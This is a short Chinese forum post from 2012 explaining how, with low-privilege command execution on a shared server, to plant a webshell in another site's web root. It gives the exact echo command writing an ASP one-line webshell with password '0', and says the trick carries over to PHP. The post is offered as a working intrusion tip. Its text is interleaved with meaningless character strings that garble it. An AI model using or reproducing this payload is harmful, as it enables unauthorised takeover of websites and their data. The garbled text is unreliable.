在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。. `5 {! D7 e) F8 w8 e2 E
# V0 b6 ]$ V& u
命令格式/ j/ d. V9 a) o9 b0 N
5 R+ H, F8 ]! g# r. i0 PEcho 语句 >目标站绝对目录, B1 J+ q: f0 [( X: v/ s+ A
/ x3 Q( i% B% I$ f! Z4 O5 ~例如: 7 ]- E5 D/ G8 H
0 w3 _) h8 y3 K! \$ }4 H+ s
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp0 a) L) N+ Z/ D! ~2 d( `! k. n. ~# n
5 y/ I- o' S# J" }+ c这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
- k0 p6 a: h. i) `5 l! Q |
发表于 2012-9-23 14:40:24
收藏
支持
反对